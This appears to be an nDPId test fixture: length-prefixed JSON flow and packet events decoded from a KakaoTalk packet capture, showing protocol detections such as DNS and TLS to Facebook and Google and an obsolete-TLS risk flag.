00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"thread_ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="}
00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="}
00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="}
00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2858,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069211639,"flow_last_seen":1430069211712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211712,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069211843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069211843,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGYfywAANRH9Kwq8AQEKGFK8ADVihwBSfKJimIGAAAEAAgAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAABNAACwRtcXR0A3Z2dsARwC8AAQABAAAAAQAErfxhAg=="}
00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2869,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069211843,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.252.97.2"}}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1430069211639,"flow_last_seen":1430069213599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":2372,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069141923,"flow_last_seen":1430069142383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2893,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069211639,"flow_last_seen":1430069212207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":349,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1430069212207,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"07dddc59e60135c7b479d39c3ae686af","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069201833,"flow_last_seen":1430069212950,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
